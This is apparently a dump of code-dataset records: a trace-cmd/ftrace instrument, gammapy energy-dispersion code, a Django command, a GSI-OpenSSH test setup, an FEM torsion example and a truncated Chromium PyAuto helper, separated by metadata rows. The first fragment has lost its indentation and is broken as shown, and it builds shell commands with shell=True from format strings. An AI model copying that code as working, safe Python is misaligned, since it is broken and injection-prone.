self.events = events if events is not None else DEFAULT_EVENTS
self.functions = functions
self.buffer_size = buffer_size
self.buffer_size_step = buffer_size_step
self.tracing_path = tracing_path
self.automark = automark
self.autoreport = autoreport
self.autoview = autoview
self.report_on_target = report_on_target
self.target_output_file = target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
text_file_name = target.path.splitext(OUTPUT_TRACE_FILE)[0] + '.txt'
self.target_text_file = target.path.join(self.target.working_directory, text_file_name)
self.target_binary = None
self.host_binary = None
self.start_time = None
self.stop_time = None
self.event_string = None
self.function_string = None
self._reset_needed = True
self.available_events_file = self.target.path.join(self.tracing_path, 'available_events')
self.available_functions_file = self.target.path.join(self.tracing_path, 'available_filter_functions')
self.buffer_size_file = self.target.path.join(self.tracing_path, 'buffer_size_kb')
self.current_tracer_file = self.target.path.join(self.tracing_path, 'current_tracer')
self.function_profile_file = self.target.path.join(self.tracing_path, 'function_profile_enabled')
self.marker_file = self.target.path.join(self.tracing_path, 'trace_marker')
self.ftrace_filter_file = self.target.path.join(self.tracing_path, 'set_ftrace_filter')
self.host_binary = which('trace-cmd')
self.kernelshark = which('kernelshark')
if not self.target.is_rooted:
raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
if self.autoreport and not self.report_on_target and self.host_binary is None:
raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
if self.autoview and self.kernelshark is None:
raise HostError('kernelshark binary must be installed on the host if autoview=True.')
if not no_install:
host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
self.target_binary = self.target.install(host_file)
else:
if not self.target.is_installed('trace-cmd'):
raise TargetError('No trace-cmd found on device and no_install=True is specified.')
self.target_binary = 'trace-cmd'
available_events = self.target.execute(
'cat {}'.format(self.available_events_file),
as_root=True).splitlines()
selected_events = []
for event in self.events:
_event = event
if event[0] != '*':
_event = '*' + event
event_re = re.compile(_event.replace('*', '.*'))
if len(filter(event_re.match, available_events)) == 0:
message = 'Event [{}] not available for tracing'.format(event)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_events.append(event)
if self.functions and len(selected_events) == 0:
selected_events = ['sched_wakeup_new']
self.event_string = _build_trace_events(selected_events)
if self.functions:
if not self.target.file_exists(self.function_profile_file):
raise TargetError('Function profiling not supported. '\
'A kernel build with CONFIG_FUNCTION_PROFILER enable is required')
available_functions = self.target.execute(
'cat {}'.format(self.available_functions_file),
as_root=True).splitlines()
selected_functions = []
for function in self.functions:
if function not in available_functions:
message = 'Function [{}] not available for profiling'.format(function)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_functions.append(function)
self.function_string = _build_trace_functions(selected_functions)
def reset(self):
if self.buffer_size:
self._set_buffer_size()
self.target.execute('{} reset'.format(self.target_binary),
as_root=True, timeout=TIMEOUT)
self._reset_needed = False
def start(self):
self.start_time = time.time()
if self._reset_needed:
self.reset()
self.target.execute('{} start {}'.format(self.target_binary, self.event_string),
as_root=True)
if self.automark:
self.mark_start()
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
if 'cpuidle' in self.target.modules:
self.logger.debug('Trace CPUIdle states')
self.target.cpuidle.perturb_cpus()
if self.functions:
self.target.execute('echo nop > {}'.format(self.current_tracer_file),
as_root=True)
self.target.execute('echo 0 > {}'.format(self.function_profile_file),
as_root=True)
self.target.execute('echo {} > {}'.format(self.function_string, self.ftrace_filter_file),
as_root=True)
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
def stop(self):
if self.functions:
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
self.stop_time = time.time()
if self.automark:
self.mark_stop()
self.target.execute('{} stop'.format(self.target_binary),
timeout=TIMEOUT, as_root=True)
self._reset_needed = True
def get_trace(self, outfile):
if os.path.isdir(outfile):
outfile = os.path.join(outfile, os.path.basename(self.target_output_file))
self.target.execute('{0} extract -o {1}; chmod 666 {1}'.format(self.target_binary,
self.target_output_file),
timeout=TIMEOUT, as_root=True)
pull_timeout = 10 * (self.stop_time - self.start_time)
self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)
if not os.path.isfile(outfile):
self.logger.warning('Binary trace not pulled from device.')
else:
if self.autoreport:
textfile = os.path.splitext(outfile)[0] + '.txt'
if self.report_on_target:
self.generate_report_on_target()
self.target.pull(self.target_text_file,
textfile, timeout=pull_timeout)
else:
self.report(outfile, textfile)
if self.autoview:
self.view(outfile)
def get_stats(self, outfile):
if not self.functions:
return
if os.path.isdir(outfile):
outfile = os.path.join(outfile, OUTPUT_PROFILE_FILE)
output = self.target._execute_util('ftrace_get_function_stats',
as_root=True)
function_stats = {}
for line in output.splitlines():
match = CPU_RE.search(line)
if match:
cpu_id = int(match.group(1))
function_stats[cpu_id] = {}
self.logger.debug("Processing stats for CPU%d...", cpu_id)
continue
match = STATS_RE.search(line)
if match:
fname = match.group(1)
function_stats[cpu_id][fname] = {
'hits' : int(match.group(2)),
'time' : float(match.group(3)),
'avg' : float(match.group(4)),
's_2' : float(match.group(5)),
}
self.logger.debug(" %s: %s",
fname, function_stats[cpu_id][fname])
self.logger.debug("FTrace stats output [%s]...", outfile)
with open(outfile, 'w') as fh:
json.dump(function_stats, fh, indent=4)
self.logger.debug("FTrace function stats save in [%s]", outfile)
return function_stats
def report(self, binfile, destfile):
try:
command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
self.logger.debug(error)
if os.path.isfile(destfile):
self.logger.debug('Verifying traces.')
with open(destfile) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def generate_report_on_target(self):
command = '{} report {} > {}'.format(self.target_binary,
self.target_output_file,
self.target_text_file)
self.target.execute(command, timeout=TIMEOUT)
def view(self, binfile):
check_output('{} {}'.format(self.kernelshark, binfile), shell=True)
def teardown(self):
self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))
def mark_start(self):
self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)
def mark_stop(self):
self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if buffer_size == attempt_buffer_size:
break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if attempt_buffer_size != buffer_size:
message = 'Failed to set trace buffer size to {}, value set was {}'
self.logger.warning(message.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
def _build_trace_functions(functions):
function_string = " ".join(functions)
return function_string
| true
| true
|
1c3e7755abcfd3bfa2f47c0829731b8bf801a9e2
| 8,752
|
py
|
Python
|
gammapy/irf/edisp/core.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | 1
|
2017-11-22T17:07:56.000Z
|
2017-11-22T17:07:56.000Z
|
gammapy/irf/edisp/core.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | null | null | null |
gammapy/irf/edisp/core.py
|
Rishank2610/gammapy
|
3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76
|
[
"BSD-3-Clause"
] | 1
|
2019-09-04T14:03:33.000Z
|
2019-09-04T14:03:33.000Z
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import scipy.special
from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
from astropy.visualization import quantity_support
from gammapy.maps import MapAxes, MapAxis, RegionGeom
from ..core import IRF
__all__ = ["EnergyDispersion2D"]
class EnergyDispersion2D(IRF):
"""Offset-dependent energy dispersion matrix.
Data format specification: :ref:`gadf:edisp_2d`
Parameters
----------
energy_axis_true : `MapAxis`
True energy axis
migra_axis : `MapAxis`
Energy migration axis
offset_axis : `MapAxis`
Field of view offset axis
data : `~numpy.ndarray`
Energy dispersion probability density
Examples
--------
Read energy dispersion IRF from disk:
>>> from gammapy.maps import MapAxis
>>> from gammapy.irf import EnergyDispersion2D
>>> filename = '$GAMMAPY_DATA/hess-dl3-dr1/data/hess_dl3_dr1_obs_id_020136.fits.gz'
>>> edisp2d = EnergyDispersion2D.read(filename, hdu="EDISP")
Create energy dispersion matrix (`~gammapy.irf.EnergyDispersion`)
for a given field of view offset and energy binning:
>>> energy = MapAxis.from_bounds(0.1, 20, nbin=60, unit="TeV", interp="log").edges
>>> edisp = edisp2d.to_edisp_kernel(offset='1.2 deg', energy=energy, energy_true=energy)
See Also
--------
EnergyDispersion
"""
tag = "edisp_2d"
required_axes = ["energy_true", "migra", "offset"]
def _mask_out_bounds(self, invalid):
return (
invalid[self.axes.index("energy_true")] & invalid[self.axes.index("migra")]
) | invalid[self.axes.index("offset")]
@classmethod
def from_gauss(
cls, energy_axis_true, migra_axis, offset_axis, bias, sigma, pdf_threshold=1e-6
):
"""Create Gaussian energy dispersion matrix (`EnergyDispersion2D`).
The output matrix will be Gaussian in (energy_true / energy).
The ``bias`` and ``sigma`` should be either floats or arrays of same dimension than
``energy_true``. ``bias`` refers to the mean value of the ``migra``
distribution minus one, i.e. ``bias=0`` means no bias.
Note that, the output matrix is flat in offset.
Parameters
----------
energy_axis_true : `MapAxis`
True energy axis
migra_axis : `~astropy.units.Quantity`
Migra axis
offset_axis : `~astropy.units.Quantity`
Bin edges of offset
bias : float or `~numpy.ndarray`
Center of Gaussian energy dispersion, bias
sigma : float or `~numpy.ndarray`
RMS width of Gaussian energy dispersion, resolution.
pdf_threshold : float, optional
Zero suppression threshold
"""
axes = MapAxes([energy_axis_true, migra_axis, offset_axis])
coords = axes.get_coord(mode="edges", axis_name="migra")
migra_min = coords["migra"][:, :-1, :]
migra_max = coords["migra"][:, 1:, :]
# Analytical formula for integral of Gaussian
s = np.sqrt(2) * sigma
t1 = (migra_max - 1 - bias) / s
t2 = (migra_min - 1 - bias) / s
pdf = (scipy.special.erf(t1) - scipy.special.erf(t2)) / 2
pdf = pdf / (migra_max - migra_min)
# no offset dependence
data = pdf * np.ones(axes.shape)
data[data < pdf_threshold] = 0
return cls(
axes=axes,
data=data.value,
)
def to_edisp_kernel(self, offset, energy_true=None, energy=None):
"""Detector response R(Delta E_reco, Delta E_true)
Probability to reconstruct an energy in a given true energy band
in a given reconstructed energy band
Parameters
----------
offset : `~astropy.coordinates.Angle`
Offset
energy_true : `~astropy.units.Quantity`, None
True energy axis
energy : `~astropy.units.Quantity`
Reconstructed energy axis
Returns
-------
edisp : `~gammapy.irf.EDispKernel`
Energy dispersion matrix
"""
from gammapy.makers.utils import make_edisp_kernel_map
offset = Angle(offset)
# TODO: expect directly MapAxis here?
if energy is None:
energy_axis = self.axes["energy_true"].copy(name="energy")
else:
energy_axis = MapAxis.from_energy_edges(energy)
if energy_true is None:
energy_axis_true = self.axes["energy_true"]
else:
energy_axis_true = MapAxis.from_energy_edges(
energy_true,
name="energy_true",
)
pointing = SkyCoord("0d", "0d")
center = pointing.directional_offset_by(
position_angle=0 * u.deg, separation=offset
)
geom = RegionGeom.create(region=center, axes=[energy_axis, energy_axis_true])
edisp = make_edisp_kernel_map(geom=geom, edisp=self, pointing=pointing)
return edisp.get_edisp_kernel()
def normalize(self):
"""Normalise energy dispersion"""
super().normalize(axis_name="migra")
def plot_migration(self, ax=None, offset=None, energy_true=None, **kwargs):
"""Plot energy dispersion for given offset and true energy.
Parameters
----------
ax : `~matplotlib.axes.Axes`, optional
Axis
offset : `~astropy.coordinates.Angle`, optional
Offset
energy_true : `~astropy.units.Quantity`, optional
True energy
**kwargs : dict
Keyword arguments forwarded to `~matplotlib.pyplot.plot`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axis
"""
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle([1], "deg")
else:
offset = np.atleast_1d(Angle(offset))
if energy_true is None:
energy_true = u.Quantity([0.1, 1, 10], "TeV")
else:
energy_true = np.atleast_1d(u.Quantity(energy_true))
migra = self.axes["migra"]
with quantity_support():
for ener in energy_true:
for off in offset:
disp = self.evaluate(
offset=off, energy_true=ener, migra=migra.center
)
label = f"offset = {off:.1f}\nenergy = {ener:.1f}"
ax.plot(migra.center, disp, label=label, **kwargs)
migra.format_plot_xaxis(ax=ax)
ax.set_ylabel("Probability density")
ax.legend(loc="upper left")
return ax
def plot_bias(self, ax=None, offset=None, add_cbar=False, **kwargs):
"""Plot migration as a function of true energy for a given offset.
Parameters
----------
ax : `~matplotlib.axes.Axes`, optional
Axis
offset : `~astropy.coordinates.Angle`, optional
Offset
add_cbar : bool
Add a colorbar to the plot.
kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.pcolormesh`.
Returns
-------
ax : `~matplotlib.axes.Axes`
Axis
"""
import matplotlib.pyplot as plt
from matplotlib.colors import PowerNorm
kwargs.setdefault("cmap", "GnBu")
kwargs.setdefault("norm", PowerNorm(gamma=0.5))
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle(1, "deg")
energy_true = self.axes["energy_true"]
migra = self.axes["migra"]
z = self.evaluate(
offset=offset,
energy_true=energy_true.center.reshape(1, -1, 1),
migra=migra.center.reshape(1, 1, -1),
).value[0]
with quantity_support():
caxes = ax.pcolormesh(energy_true.edges, migra.edges, z.T, **kwargs)
energy_true.format_plot_xaxis(ax=ax)
migra.format_plot_yaxis(ax=ax)
if add_cbar:
label = "Probability density (A.U.)"
ax.figure.colorbar(caxes, ax=ax, label=label)
return ax
def peek(self, figsize=(15, 5)):
"""Quick-look summary plots.
Parameters
----------
figsize : (float, float)
Size of the resulting plot
"""
import matplotlib.pyplot as plt
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)
self.plot_bias(ax=axes[0])
self.plot_migration(ax=axes[1])
edisp = self.to_edisp_kernel(offset="1 deg")
edisp.plot_matrix(ax=axes[2])
plt.tight_layout()
| 31.595668
| 92
| 0.589808
|
import numpy as np
import scipy.special
from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
from astropy.visualization import quantity_support
from gammapy.maps import MapAxes, MapAxis, RegionGeom
from ..core import IRF
__all__ = ["EnergyDispersion2D"]
class EnergyDispersion2D(IRF):
tag = "edisp_2d"
required_axes = ["energy_true", "migra", "offset"]
def _mask_out_bounds(self, invalid):
return (
invalid[self.axes.index("energy_true")] & invalid[self.axes.index("migra")]
) | invalid[self.axes.index("offset")]
@classmethod
def from_gauss(
cls, energy_axis_true, migra_axis, offset_axis, bias, sigma, pdf_threshold=1e-6
):
axes = MapAxes([energy_axis_true, migra_axis, offset_axis])
coords = axes.get_coord(mode="edges", axis_name="migra")
migra_min = coords["migra"][:, :-1, :]
migra_max = coords["migra"][:, 1:, :]
s = np.sqrt(2) * sigma
t1 = (migra_max - 1 - bias) / s
t2 = (migra_min - 1 - bias) / s
pdf = (scipy.special.erf(t1) - scipy.special.erf(t2)) / 2
pdf = pdf / (migra_max - migra_min)
data = pdf * np.ones(axes.shape)
data[data < pdf_threshold] = 0
return cls(
axes=axes,
data=data.value,
)
def to_edisp_kernel(self, offset, energy_true=None, energy=None):
from gammapy.makers.utils import make_edisp_kernel_map
offset = Angle(offset)
if energy is None:
energy_axis = self.axes["energy_true"].copy(name="energy")
else:
energy_axis = MapAxis.from_energy_edges(energy)
if energy_true is None:
energy_axis_true = self.axes["energy_true"]
else:
energy_axis_true = MapAxis.from_energy_edges(
energy_true,
name="energy_true",
)
pointing = SkyCoord("0d", "0d")
center = pointing.directional_offset_by(
position_angle=0 * u.deg, separation=offset
)
geom = RegionGeom.create(region=center, axes=[energy_axis, energy_axis_true])
edisp = make_edisp_kernel_map(geom=geom, edisp=self, pointing=pointing)
return edisp.get_edisp_kernel()
def normalize(self):
super().normalize(axis_name="migra")
def plot_migration(self, ax=None, offset=None, energy_true=None, **kwargs):
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle([1], "deg")
else:
offset = np.atleast_1d(Angle(offset))
if energy_true is None:
energy_true = u.Quantity([0.1, 1, 10], "TeV")
else:
energy_true = np.atleast_1d(u.Quantity(energy_true))
migra = self.axes["migra"]
with quantity_support():
for ener in energy_true:
for off in offset:
disp = self.evaluate(
offset=off, energy_true=ener, migra=migra.center
)
label = f"offset = {off:.1f}\nenergy = {ener:.1f}"
ax.plot(migra.center, disp, label=label, **kwargs)
migra.format_plot_xaxis(ax=ax)
ax.set_ylabel("Probability density")
ax.legend(loc="upper left")
return ax
def plot_bias(self, ax=None, offset=None, add_cbar=False, **kwargs):
import matplotlib.pyplot as plt
from matplotlib.colors import PowerNorm
kwargs.setdefault("cmap", "GnBu")
kwargs.setdefault("norm", PowerNorm(gamma=0.5))
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle(1, "deg")
energy_true = self.axes["energy_true"]
migra = self.axes["migra"]
z = self.evaluate(
offset=offset,
energy_true=energy_true.center.reshape(1, -1, 1),
migra=migra.center.reshape(1, 1, -1),
).value[0]
with quantity_support():
caxes = ax.pcolormesh(energy_true.edges, migra.edges, z.T, **kwargs)
energy_true.format_plot_xaxis(ax=ax)
migra.format_plot_yaxis(ax=ax)
if add_cbar:
label = "Probability density (A.U.)"
ax.figure.colorbar(caxes, ax=ax, label=label)
return ax
def peek(self, figsize=(15, 5)):
import matplotlib.pyplot as plt
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)
self.plot_bias(ax=axes[0])
self.plot_migration(ax=axes[1])
edisp = self.to_edisp_kernel(offset="1 deg")
edisp.plot_matrix(ax=axes[2])
plt.tight_layout()
| true
| true
|
1c3e78fd908e52d77a53d8e59192195a4a3ac042
| 183
|
py
|
Python
|
assetfiles/management/commands/findstatic.py
|
localmed/django-assetfiles
|
34089780126989f49e6b890b85a90047704fde37
|
[
"MIT"
] | null | null | null |
assetfiles/management/commands/findstatic.py
|
localmed/django-assetfiles
|
34089780126989f49e6b890b85a90047704fde37
|
[
"MIT"
] | 2
|
2017-02-11T20:10:46.000Z
|
2017-02-11T20:10:56.000Z
|
assetfiles/management/commands/findstatic.py
|
localmed/django-assetfiles
|
34089780126989f49e6b890b85a90047704fde37
|
[
"MIT"
] | null | null | null |
from django.contrib.staticfiles.management.commands import findstatic
"""
`findstatic` is used in exactly the same way as staticfiles' `findstatic`.
"""
Command = findstatic.Command
| 26.142857
| 74
| 0.786885
|
from django.contrib.staticfiles.management.commands import findstatic
Command = findstatic.Command
| true
| true
|
1c3e79916311ed421944b038cd76799d9f019587
| 2,003
|
py
|
Python
|
osgtest/tests/test_280_gsiopenssh.py
|
djw8605/osg-test
|
9cbbd48875863cb30627989c12df40e0daf3985c
|
[
"Apache-2.0"
] | 1
|
2016-03-09T20:24:07.000Z
|
2016-03-09T20:24:07.000Z
|
osgtest/tests/test_280_gsiopenssh.py
|
djw8605/osg-test
|
9cbbd48875863cb30627989c12df40e0daf3985c
|
[
"Apache-2.0"
] | 122
|
2016-03-23T16:59:07.000Z
|
2022-02-23T18:25:34.000Z
|
osgtest/tests/test_280_gsiopenssh.py
|
djw8605/osg-test
|
9cbbd48875863cb30627989c12df40e0daf3985c
|
[
"Apache-2.0"
] | 14
|
2016-03-09T17:54:20.000Z
|
2021-07-02T15:51:23.000Z
|
from osgtest.library import core
from osgtest.library import osgunittest
from osgtest.library import files
from osgtest.library import service
SSHD_CONFIG = "/etc/gsissh/sshd_config"
SSHD_CONFIG_TEXT = r'''
Port %(port)s
AuthorizedKeysFile .ssh/authorized_keys
UsePrivilegeSeparation sandbox
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPICleanupCredentials yes
GSSAPIStrictAcceptorCheck yes
GSSAPIKeyExchange yes
RSAAuthentication no
PubkeyAuthentication no
PasswordAuthentication no
ChallengeResponseAuthentication no
Subsystem sftp /usr/libexec/gsissh/sftp-server
'''
class TestStartGSIOpenSSH(osgunittest.OSGTestCase):
@core.osgrelease('3.5')
def setUp(self):
core.skip_ok_unless_installed('gsi-openssh-server', 'gsi-openssh-clients')
def test_01_set_config(self):
port = core.config['gsisshd.port'] = '2222'
core.state['gsisshd.can-run'] = (not (
core.el_release() >= 7 and
core.state['selinux.mode'] and
not core.dependency_is_installed("/usr/sbin/semanage")))
self.skip_ok_unless(core.state['gsisshd.can-run'],
"Can't run with SELinux on EL >= 7 without semanage")
files.write(
SSHD_CONFIG,
SSHD_CONFIG_TEXT % {'port': port},
owner='gsissh',
chmod=0o600)
def test_02_setup_selinux_port(self):
if not core.state['selinux.mode']:
self.skip_ok('SELinux disabled')
core.skip_ok_unless_installed("/usr/sbin/semanage", by_dependency=True)
port = core.config['gsisshd.port']
core.check_system(['semanage', 'port', '--add', '-t', 'ssh_port_t', '--proto', 'tcp', port],
message="Allow [gsi]sshd to use port %s" % port)
def test_03_start(self):
core.state['gsisshd.started-service'] = False
self.skip_ok_unless(core.state['gsisshd.can-run'], "Can't run gsisshd (see above)")
service.check_start('gsisshd')
| 33.383333
| 100
| 0.673989
|
from osgtest.library import core
from osgtest.library import osgunittest
from osgtest.library import files
from osgtest.library import service
SSHD_CONFIG = "/etc/gsissh/sshd_config"
SSHD_CONFIG_TEXT = r'''
Port %(port)s
AuthorizedKeysFile .ssh/authorized_keys
UsePrivilegeSeparation sandbox
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPICleanupCredentials yes
GSSAPIStrictAcceptorCheck yes
GSSAPIKeyExchange yes
RSAAuthentication no
PubkeyAuthentication no
PasswordAuthentication no
ChallengeResponseAuthentication no
Subsystem sftp /usr/libexec/gsissh/sftp-server
'''
class TestStartGSIOpenSSH(osgunittest.OSGTestCase):
@core.osgrelease('3.5')
def setUp(self):
core.skip_ok_unless_installed('gsi-openssh-server', 'gsi-openssh-clients')
def test_01_set_config(self):
port = core.config['gsisshd.port'] = '2222'
core.state['gsisshd.can-run'] = (not (
core.el_release() >= 7 and
core.state['selinux.mode'] and
not core.dependency_is_installed("/usr/sbin/semanage")))
self.skip_ok_unless(core.state['gsisshd.can-run'],
"Can't run with SELinux on EL >= 7 without semanage")
files.write(
SSHD_CONFIG,
SSHD_CONFIG_TEXT % {'port': port},
owner='gsissh',
chmod=0o600)
def test_02_setup_selinux_port(self):
if not core.state['selinux.mode']:
self.skip_ok('SELinux disabled')
core.skip_ok_unless_installed("/usr/sbin/semanage", by_dependency=True)
port = core.config['gsisshd.port']
core.check_system(['semanage', 'port', '--add', '-t', 'ssh_port_t', '--proto', 'tcp', port],
message="Allow [gsi]sshd to use port %s" % port)
def test_03_start(self):
core.state['gsisshd.started-service'] = False
self.skip_ok_unless(core.state['gsisshd.can-run'], "Can't run gsisshd (see above)")
service.check_start('gsisshd')
| true
| true
|
1c3e7a4fba332045a6cc535936322932cb36765b
| 1,410
|
py
|
Python
|
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | 10
|
2021-03-21T18:38:40.000Z
|
2022-02-22T01:32:06.000Z
|
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | null | null | null |
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | 1
|
2022-02-08T04:40:59.000Z
|
2022-02-08T04:40:59.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from FEM.Torsion2D import Torsion2D
from FEM.Mesh.Delaunay import Delaunay
a = 0.3
b = 0.3
tw = 0.05
tf = 0.05
E = 200000
v = 0.27
G = E / (2 * (1 + v))
phi = 1
vertices = [
[0, 0],
[a, 0],
[a, tf],
[a / 2 + tw / 2, tf],
[a / 2 + tw / 2, tf + b],
[a, tf + b],
[a, 2 * tf + b],
[0, 2 * tf + b],
[0, tf + b],
[a / 2 - tw / 2, tf + b],
[a / 2 - tw / 2, tf],
[0, tf],
]
fillet_radius = 0.0254
fillets = [{'start_segment': 2, 'end_segment': 3, 'r': fillet_radius, 'n': 10},
{'start_segment': 3, 'end_segment': 4, 'r': fillet_radius, 'n': 10},
{'start_segment': 8, 'end_segment': 9, 'r': fillet_radius, 'n': 10},
{'start_segment': 9, 'end_segment': 10, 'r': fillet_radius, 'n': 10}]
params = Delaunay._strdelaunay(constrained=True, delaunay=True,
a='0.00003', o=2)
geometria = Delaunay(vertices, params, fillets=fillets)
geometria.show()
plt.show()
# geometria.saveMesh('Mesh_tests/I_test')
# geometria = Mesh.Geometry.loadmsh('Mesh_tests/I_test.msh')
print(len(geometria.elements))
O = Torsion2D(geometria, G, phi)
O.solve()
plt.show()
integral = 0
for i, e in enumerate(O.elements):
_, _u = e.giveSolution(domain='gauss-points')
jac, dpz = e.J(e.Z.T)
detjac = np.linalg.det(jac)
integral += np.sum(_u*e.W*detjac)
print(integral*2/G)
| 27.115385
| 80
| 0.574468
|
import numpy as np
import matplotlib.pyplot as plt
from FEM.Torsion2D import Torsion2D
from FEM.Mesh.Delaunay import Delaunay
a = 0.3
b = 0.3
tw = 0.05
tf = 0.05
E = 200000
v = 0.27
G = E / (2 * (1 + v))
phi = 1
vertices = [
[0, 0],
[a, 0],
[a, tf],
[a / 2 + tw / 2, tf],
[a / 2 + tw / 2, tf + b],
[a, tf + b],
[a, 2 * tf + b],
[0, 2 * tf + b],
[0, tf + b],
[a / 2 - tw / 2, tf + b],
[a / 2 - tw / 2, tf],
[0, tf],
]
fillet_radius = 0.0254
fillets = [{'start_segment': 2, 'end_segment': 3, 'r': fillet_radius, 'n': 10},
{'start_segment': 3, 'end_segment': 4, 'r': fillet_radius, 'n': 10},
{'start_segment': 8, 'end_segment': 9, 'r': fillet_radius, 'n': 10},
{'start_segment': 9, 'end_segment': 10, 'r': fillet_radius, 'n': 10}]
params = Delaunay._strdelaunay(constrained=True, delaunay=True,
a='0.00003', o=2)
geometria = Delaunay(vertices, params, fillets=fillets)
geometria.show()
plt.show()
print(len(geometria.elements))
O = Torsion2D(geometria, G, phi)
O.solve()
plt.show()
integral = 0
for i, e in enumerate(O.elements):
_, _u = e.giveSolution(domain='gauss-points')
jac, dpz = e.J(e.Z.T)
detjac = np.linalg.det(jac)
integral += np.sum(_u*e.W*detjac)
print(integral*2/G)
| true
| true
|
1c3e7aece6b9e5fafeb3f4141d5fc01faaf56eec
| 14,849
|
py
|
Python
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | 1
|
2016-03-10T09:13:57.000Z
|
2016-03-10T09:13:57.000Z
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | 1
|
2022-03-13T08:39:05.000Z
|
2022-03-13T08:39:05.000Z
|
chrome/test/functional/test_utils.py
|
gavinp/chromium
|
681563ea0f892a051f4ef3d5e53438e0bb7d2261
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import ctypes
import email
import logging
import os
import platform
import shutil
import smtplib
import subprocess
import sys
import types
import pyauto_functional
import pyauto
import pyauto_utils
"""Commonly used functions for PyAuto tests."""
def CopyFileFromDataDirToDownloadDir(test, file_path):
"""Copy a file from data directory to downloads directory.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
path: path of the file relative to the data directory
"""
data_file = os.path.join(test.DataDir(), file_path)
download_dir = test.GetDownloadDirectory().value()
shutil.copy(data_file, download_dir)
def DownloadFileFromDownloadsDataDir(test, file_name):
"""Download a file from downloads data directory, in first tab, first window.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
file_name: name of file to download.
"""
file_url = test.GetFileURLForDataPath(os.path.join('downloads', file_name))
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
# Check if file already exists. If so then delete it.
if os.path.exists(downloaded_pkg):
RemoveDownloadedTestFile(test, file_name)
pre_download_ids = [x['id'] for x in test.GetDownloadsInfo().Downloads()]
test.DownloadAndWaitForStart(file_url)
test.WaitForAllDownloadsToComplete(pre_download_ids)
def RemoveDownloadedTestFile(test, file_name):
"""Delete a file from the downloads directory.
Arg:
test: derived from pyauto.PyUITest - base class for UI test cases
file_name: name of file to remove
"""
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
pyauto_utils.RemovePath(downloaded_pkg)
pyauto_utils.RemovePath(downloaded_pkg + '.crdownload')
def GoogleAccountsLogin(test, username, password, tab_index=0, windex=0):
"""Log into Google Accounts.
Attempts to login to Google by entering the username/password into the google
login page and click submit button.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
username: users login input.
